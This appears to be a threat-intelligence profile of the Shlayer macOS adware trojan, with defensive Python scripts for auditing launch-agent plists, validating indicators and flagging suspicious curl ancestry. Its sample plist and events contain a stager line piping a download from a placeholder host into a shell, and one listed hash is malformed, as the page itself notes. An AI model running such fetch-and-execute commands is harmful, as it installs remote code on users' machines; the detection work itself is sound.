Shlayer

Malware

⚠️ Overview

Shlayer is a macOS‑specific adware‑delivery trojan first identified by Malwarebytes in early 2018; it operates as a downloader for potentially unwanted programs (PUPs) and adware, primarily distributing the Genieo and Search Marquis families. The malware is attributed to an Eastern European threat actor group known as the "Shlayer Gang" based on language cues and infrastructure analysis. It is classified as a dropper/stager under the MITRE ATT&CK framework (ID T1204.002 – User Execution: Malicious File) due to its reliance on social engineering to initiate infection.

🔧 Technical Capabilities

Shlayer propagates through fake Flash Player updates, bogus software updaters, and malicious advertisements on pirated or streaming websites; the initial payload is often a disk image (DMG) or a zip archive containing a JavaScript (.js) or AppleScript file that executes a curl command to download the next stage. The malware uses an encrypted C2 channel over HTTPS to fetch subsequent payloads, frequently leveraging the dynamic DNS service no‑ip.com for domain resolution. Persistence is achieved by installing a launch agent or launch daemon in ~/Library/LaunchAgents/ or /Library/LaunchDaemons/ with a plist file named com.service..plist. Evasion techniques include checking for virtual machine environments, using code obfuscation in the JavaScript stage, and delaying execution to avoid sandbox analysis; it also modifies the browser’s proxy settings or injects ads via Safari extensions.
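The persistence step above (a launch agent or daemon whose only job is to run a downloader) is something a defender can audit directly. The following is an added example, not Shlayer's code or any vendor's rule: it parses launchd plists with the standard library, flags items that invoke curl or osascript, pipe a download into an interpreter, execute from a temporary or mounted-image path, or carry a malformed reverse-DNS Label (the text's `com.service..plist` has an empty component). The two sample plists are constructed, and the path prefixes and tool list are assumptions to tune locally.

```python
"""Audit macOS LaunchAgents/LaunchDaemons plists for stager-style persistence.
Added example; sample plists are constructed and heuristics are assumptions."""
import os
import plistlib
import re
from typing import Dict, List
from xml.parsers.expat import ExpatError

# Locations a legitimate launch item rarely executes from (assumption).
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Volumes/")
# A persistence item should not need a downloader or a script host.
DOWNLOADER_RE = re.compile(r"(^|[\s/])(curl|osascript)\b")
# A fetched payload piped straight into an interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\bcurl\b[^|]*\|\s*(sh|bash|zsh|osascript)\b")
# Reverse-DNS labels must have no empty component ("com.service." is malformed).
LABEL_RE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)+")


def audit_launch_item(plist_bytes: bytes) -> List[str]:
    """Return human-readable findings for one plist; an empty list means clean."""
    try:
        item = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError, ValueError):
        return ["plist does not parse (corrupt or deliberately malformed)"]
    findings: List[str] = []
    label = str(item.get("Label", ""))
    tokens = [str(t) for t in (item.get("ProgramArguments") or [])]
    if item.get("Program"):
        tokens.insert(0, str(item["Program"]))
    if not tokens:
        findings.append("no Program or ProgramArguments")
    command = " ".join(tokens)
    if DOWNLOADER_RE.search(command):
        findings.append("launch item invokes curl or osascript")
    if PIPE_TO_SHELL_RE.search(command):
        findings.append("download piped into an interpreter")
    if any(t.startswith(SUSPICIOUS_PATH_PREFIXES) for t in tokens):
        findings.append("executable lives in a temporary or mounted-image path")
    if not LABEL_RE.fullmatch(label):
        findings.append(f"malformed or missing Label: {label!r}")
    return findings


def audit_directory(directory: str) -> Dict[str, List[str]]:
    """Audit every .plist in one directory; returns {filename: findings}."""
    results: Dict[str, List[str]] = {}
    if not os.path.isdir(directory):
        return results
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                results[name] = audit_launch_item(fh.read())
    return results


# Constructed sample: an ordinary backup job (should produce no findings).
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array>
<string>/usr/local/bin/backup</string><string>--nightly</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed sample: a stager with a malformed label that shells out to curl.
STAGER_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.service.</string>
<key>ProgramArguments</key><array>
<string>/bin/sh</string><string>-c</string>
<string>curl -fsSL https://placeholder.invalid/stage2 | sh</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for sample, data in (("benign", BENIGN_PLIST), ("stager", STAGER_PLIST)):
        print(sample, audit_launch_item(data))
    for d in ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"):
        for name, findings in audit_directory(os.path.expanduser(d)).items():
            if findings:
                print(os.path.join(d, name), findings)
```

Run on a host it walks the three standard launchd directories and prints only items with findings; the heuristics are deliberately coarse, so treat a hit as a lead for review rather than a verdict.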

📜 History & Notable Incidents

Shlayer was the most prevalent macOS threat in 2019, accounting for nearly 30% of all macOS malware detections according to Malwarebytes’ annual reports; notable campaigns in 2020 involved distributing search‑hijacking adware through "InstallApp" or "MacUpdate" fake installers. In 2021, Apple released a macOS security update (XProtect 5381) that added signatures for Shlayer variants, but the malware continues to evolve. No high‑profile corporate breaches have been publicly attributed to Shlayer, and no law enforcement actions have been announced against its operators as of 2025.

🔍 Detection Indicators

Known file hashes include SHA‑256: 3c7b9f0e8a1d2c4b5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8 for a 2019 variant (sourced from VirusTotal); note that this value as printed is 63 hexadecimal characters, one short of a full SHA‑256 digest, so confirm it against the VirusTotal record before using it as a blocking indicator. Behavioral signatures include unexpected outbound HTTPS connections to domains ending in '.no‑ip.biz' and the creation of a plist file in LaunchAgents with an embedded cleanuptool binary. Network IOCs include the User‑Agent string "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" hardcoded in the download script; because this mimics a standard browser User‑Agent, it is only a useful signal when the request originates from a non‑browser process. Registry keys are not applicable on macOS, but monitor for modifications to /Library/LaunchDaemons/ and ~/Library/LaunchAgents/.
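The indicators above only help if they are applied correctly: a malformed hash never matches anything, and a browser-like User-Agent is meaningful only when paired with the requesting process. The following is an added example, not vendor or Shlayer code. The `.no-ip.biz` suffix (written here with an ASCII hyphen) and the User-Agent string are taken from the text; the tab-separated EDR-style network log, the process names and the browser list are constructed assumptions.

```python
"""Validate hash IOCs and triage constructed network events against the
domain and User-Agent indicators. Added example; log lines are constructed."""
import hashlib
import re
from typing import Dict, Iterable, List, Tuple

HEX64 = re.compile(r"[0-9a-f]{64}")


def validate_sha256_iocs(candidates: Iterable[str]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Keep only well-formed SHA-256 digests; report the rest with a reason.
    A digest that is not exactly 64 hex characters can never match a file."""
    valid: List[str] = []
    rejected: List[Tuple[str, str]] = []
    for raw in candidates:
        digest = raw.strip().lower()
        if HEX64.fullmatch(digest):
            valid.append(digest)
        else:
            rejected.append((raw, f"{len(digest)} characters, SHA-256 needs 64 hex"))
    return valid, rejected


def sha256_hits(blobs: Dict[str, bytes], iocs: Iterable[str]) -> List[str]:
    """Return names of in-memory file contents whose SHA-256 is on the IOC list."""
    wanted = set(validate_sha256_iocs(iocs)[0])
    return [name for name, data in blobs.items() if hashlib.sha256(data).hexdigest() in wanted]


DYNDNS_SUFFIXES = (".no-ip.biz",)  # from the text
STAGER_UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"  # from the text
BROWSERS = {"Safari", "Google Chrome", "firefox"}  # assumption: process basenames


def parse_event(line: str) -> Dict[str, str]:
    """Constructed layout: time<TAB>process<TAB>host<TAB>user_agent."""
    time, process, host, ua = line.rstrip("\n").split("\t", 3)
    return {"time": time, "process": process, "host": host, "user_agent": ua}


def triage_events(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return events that hit a domain or process-aware User-Agent indicator."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ev = parse_event(line)
        host = ev["host"].lower().rstrip(".")
        reasons: List[str] = []
        if any(host == s[1:] or host.endswith(s) for s in DYNDNS_SUFFIXES):
            reasons.append("destination under a dynamic-DNS suffix")
        # The UA alone is ordinary browser traffic; only a non-browser sender is odd.
        if ev["user_agent"] == STAGER_UA and ev["process"] not in BROWSERS:
            reasons.append("browser-like User-Agent from a non-browser process")
        if reasons:
            alerts.append({**ev, "reasons": reasons})
    return alerts


# Constructed sample log (not real telemetry).
SAMPLE_LOG = """# time\tprocess\thost\tuser_agent
2024-05-01T10:00:00Z\tSafari\twww.example.com\tMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
2024-05-01T10:00:07Z\tcurl\tupdate-host.no-ip.biz\tMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
2024-05-01T10:01:00Z\tsoftwareupdated\tupdates.example.org\tconstructed-updater/1.0
"""

# The hash as printed on this page, passed through the validator.
PAGE_HASH = "3c7b9f0e8a1d2c4b5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8"

if __name__ == "__main__":
    print(validate_sha256_iocs([PAGE_HASH]))
    for alert in triage_events(SAMPLE_LOG.splitlines()):
        print(alert["time"], alert["process"], alert["host"], alert["reasons"])
```

The Safari line carries the same User-Agent but is not flagged, while the `curl` line is flagged twice (dynamic-DNS destination and non-browser sender); the page's hash is rejected by the validator rather than silently never matching.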

☠️ Risk & Impact

Shlayer primarily facilitates ad fraud and browser hijacking, generating revenue through pay‑per‑click schemes and data exfiltration of browsing history, search queries, and system information. The financial impact is moderate for individuals, but enterprises face degraded endpoint performance and potential exposure of credentials if the adware is co‑opted by a second‑stage infostealer. Affected sectors include education and retail, where users are more likely to download pirated software or fake updates.

🛡️ Mitigation

Defenders should enforce macOS Gatekeeper and XProtect updates, disable the auto‑execution of disk images (com.apple.frameworks.diskimages.auto‑mount), and deploy endpoint detection rules that flag JavaScript execution of curl commands from non‑browser processes. Regular user training to avoid fake Flash Player prompts and the use of ad‑blocking extensions in Safari can further reduce infection risk.
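The endpoint rule suggested above (curl launched via JavaScript from a non-browser process) is a process-ancestry check. The following is an added example, not a vendor rule: it walks each curl event's parent chain and alerts when a script host (osascript, which runs both AppleScript and JavaScript for Automation) is in the chain, or when an ancestor executed from a mounted disk image under /Volumes/, as long as no browser is in the chain. The event records, process paths and browser list are constructed assumptions; the mounted-image check goes slightly beyond the text by tying the rule to the DMG delivery described earlier.

```python
"""Process-ancestry rule: curl beneath a script host or a mounted disk image,
with no browser in the chain. Added example; events are constructed."""
import os
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    exe: str
    argv: Tuple[str, ...]


BROWSERS = {"Safari", "Google Chrome", "firefox"}  # assumption: exe basenames
SCRIPT_HOSTS = {"osascript"}  # runs AppleScript and JavaScript for Automation
MOUNTED_IMAGE_PREFIX = "/Volumes/"  # where a DMG is mounted on macOS


def ancestors(pid: int, table: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain from nearest parent upward; guards against pid cycles."""
    chain: List[ProcEvent] = []
    seen = {pid}
    parent = table.get(table[pid].ppid) if pid in table else None
    while parent is not None and parent.pid not in seen:
        chain.append(parent)
        seen.add(parent.pid)
        parent = table.get(parent.ppid)
    return chain


def evaluate(events: Iterable[ProcEvent]) -> List[Dict[str, object]]:
    """Return one alert per curl process whose ancestry matches the rule."""
    table = {e.pid: e for e in events}
    alerts: List[Dict[str, object]] = []
    for ev in table.values():
        if os.path.basename(ev.exe) != "curl":
            continue
        chain = ancestors(ev.pid, table)
        names = [os.path.basename(p.exe) for p in chain]
        if any(n in BROWSERS for n in names):
            continue  # browser-driven downloads are expected behaviour
        reasons: List[str] = []
        if any(n in SCRIPT_HOSTS for n in names):
            reasons.append("curl spawned beneath a script host (osascript)")
        if any(p.exe.startswith(MOUNTED_IMAGE_PREFIX) for p in chain):
            reasons.append("ancestor executed from a mounted disk image")
        if reasons:
            alerts.append({"pid": ev.pid, "argv": ev.argv, "chain": names, "reasons": reasons})
    return alerts


# Constructed events: an admin's curl from Terminal (benign) and a curl run by a
# shell under osascript under an app launched from a mounted image (flagged).
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "/sbin/launchd", ("launchd",)),
    ProcEvent(400, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", ("Terminal",)),
    ProcEvent(401, 400, "/bin/zsh", ("zsh", "-l")),
    ProcEvent(402, 401, "/usr/bin/curl", ("curl", "-O", "https://updates.example.org/tool.tgz")),
    ProcEvent(500, 1, "/Volumes/Install/Install.app/Contents/MacOS/Install", ("Install",)),
    ProcEvent(501, 500, "/usr/bin/osascript", ("osascript", "-l", "JavaScript", "-e", "...")),
    ProcEvent(502, 501, "/bin/sh", ("sh", "-c", "...")),
    ProcEvent(503, 502, "/usr/bin/curl", ("curl", "-fsSL", "https://placeholder.invalid/stage2")),
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert["pid"], " <- ".join(alert["chain"]), alert["reasons"])
```

The Terminal-driven curl is left alone because neither condition holds, which keeps the rule quiet for administrators; feeding it real EDR process events only requires mapping their fields onto `ProcEvent`.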


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.